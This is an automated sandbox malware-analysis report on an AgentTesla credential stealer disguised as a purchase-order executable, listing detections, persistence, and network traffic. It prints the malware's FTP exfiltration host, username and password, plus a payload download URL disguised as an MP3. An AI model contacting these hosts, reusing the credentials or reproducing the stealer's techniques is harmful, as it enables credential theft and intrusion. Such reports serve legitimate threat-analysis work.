Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_9876563647-FLOWTRONIX (FT)UUE.exe

Overview

General Information

Sample name:PO_9876563647-FLOWTRONIX (FT)UUE.exe
Analysis ID:1523145
MD5:0fd28ed18e522b9eef69b57aa8bdbf8f
SHA1:5eba649f7e0cead07e1788973b9deae4c54e7a46
SHA256:3996fdec3ceac6027730777ec99f6870a9c76e3904a1d2c78cef954a7484090e
Tags:exeuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO_9876563647-FLOWTRONIX (FT)UUE.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe" MD5: 0FD28ED18E522B9EEF69B57AA8BDBF8F)
    • InstallUtil.exe (PID: 3280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Xpnzea.exe (PID: 6876 cmdline: "C:\Users\user\AppData\Roaming\Xpnzea.exe" MD5: 0FD28ED18E522B9EEF69B57AA8BDBF8F)
    • InstallUtil.exe (PID: 4836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Xpnzea.exe (PID: 4260 cmdline: "C:\Users\user\AppData\Roaming\Xpnzea.exe" MD5: 0FD28ED18E522B9EEF69B57AA8BDBF8F)
    • InstallUtil.exe (PID: 3848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 47 entries
              SourceRuleDescriptionAuthorStrings
              8.2.Xpnzea.exe.41e3250.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                6.2.Xpnzea.exe.4583250.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5d40000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    6.2.Xpnzea.exe.3d34a70.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      6.2.Xpnzea.exe.3d34a70.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                        Click to see the 20 entries

                        System Summary

                        barindex
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Xpnzea.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe, ProcessId: 2944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xpnzea
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-01T07:31:32.844326+020020299271A Network Trojan was detected192.168.2.8497065.2.84.23621TCP
                        2024-10-01T07:31:48.017800+020020299271A Network Trojan was detected192.168.2.8497125.2.84.23621TCP
                        2024-10-01T07:31:56.098704+020020299271A Network Trojan was detected192.168.2.8497155.2.84.23621TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-01T07:31:26.751565+020020226401A Network Trojan was detected67.212.175.162443192.168.2.849705TCP
                        2024-10-01T07:31:42.581347+020020226401A Network Trojan was detected67.212.175.162443192.168.2.849710TCP
                        2024-10-01T07:31:50.753234+020020226401A Network Trojan was detected67.212.175.162443192.168.2.849714TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-01T07:31:26.751565+020020179621A Network Trojan was detected67.212.175.162443192.168.2.849705TCP
                        2024-10-01T07:31:42.581347+020020179621A Network Trojan was detected67.212.175.162443192.168.2.849710TCP
                        2024-10-01T07:31:50.753234+020020179621A Network Trojan was detected67.212.175.162443192.168.2.849714TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-01T07:31:33.460095+020028555421A Network Trojan was detected192.168.2.8497075.2.84.23663484TCP
                        2024-10-01T07:31:33.465327+020028555421A Network Trojan was detected192.168.2.8497075.2.84.23663484TCP
                        2024-10-01T07:31:48.642241+020028555421A Network Trojan was detected192.168.2.8497135.2.84.23661512TCP
                        2024-10-01T07:31:48.647690+020028555421A Network Trojan was detected192.168.2.8497135.2.84.23661512TCP
                        2024-10-01T07:31:56.716214+020028555421A Network Trojan was detected192.168.2.8497165.2.84.23664722TCP
                        2024-10-01T07:31:56.721436+020028555421A Network Trojan was detected192.168.2.8497165.2.84.23664722TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                        Source: https://wymascensores.comVirustotal: Detection: 6%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeReversingLabs: Detection: 47%
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeVirustotal: Detection: 32%Perma Link
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeReversingLabs: Detection: 47%
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeVirustotal: Detection: 32%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeJoe Sandbox ML: detected
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeJoe Sandbox ML: detected
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49705 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49710 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49714 version: TLS 1.2
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1486633819.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.000000000304C000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000003957000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1486633819.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.000000000304C000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000003957000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then jmp 05E23DC5h0_2_05E23C08
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then jmp 05E23DC5h0_2_05E23BF8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05E22BC0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05E22BB8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then jmp 05E3E410h0_2_05E3E350
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then jmp 05E3E410h0_2_05E3E358
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then jmp 05E36744h0_2_05E366E0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then jmp 05E36744h0_2_05E366E5
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then jmp 05E37406h0_2_05E37220
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05EED330
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 06183DC5h6_2_06183C08
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 06183DC5h6_2_06183E8B
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h6_2_06182BB8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h6_2_06182BC0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 06183DC5h6_2_06183BF8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 06197406h6_2_06197212
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 06197406h6_2_06197220
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 06196744h6_2_061966D0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 06196744h6_2_061966E0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 0619E410h6_2_0619E358
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 0619E410h6_2_0619E350
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h6_2_0624D330
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 05BE3DC5h8_2_05BE3C08
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h8_2_05BE2BB8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 05BE3DC5h8_2_05BE3BF8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h8_2_05BE2BC0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 05BFE410h8_2_05BFE358
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 05BFE410h8_2_05BFE350
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 05BF6744h8_2_05BF66E0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 05BF6744h8_2_05BF66D0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 05BF7406h8_2_05BF7220
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then jmp 05BF7406h8_2_05BF7212
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h8_2_05CAD330

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49707 -> 5.2.84.236:63484
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49706 -> 5.2.84.236:21
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49713 -> 5.2.84.236:61512
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49712 -> 5.2.84.236:21
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49716 -> 5.2.84.236:64722
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49715 -> 5.2.84.236:21
                        Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.8:49705
                        Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.8:49705
                        Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.8:49710
                        Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.8:49710
                        Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.8:49714
                        Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.8:49714
                        Source: global trafficTCP traffic: 5.2.84.236 ports 63484,64722,61512,1,2,21
                        Source: global trafficTCP traffic: 192.168.2.8:49707 -> 5.2.84.236:63484
                        Source: global trafficHTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 67.212.175.162 67.212.175.162
                        Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                        Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
                        Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.8:49706 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 08:31. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: wymascensores.com
                        Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                        Source: InstallUtil.exe, 00000002.00000002.1629857451.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1629857451.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1709180379.000000000285D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1709180379.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2691701821.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2691701821.0000000002A4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1629857451.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1709180379.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2691701821.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1652064396.00000000046A6000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000004306000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/servex/Evzbwt.mp3
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49705 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49710 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49714 version: TLS 1.2

                        System Summary

                        barindex
                        Source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
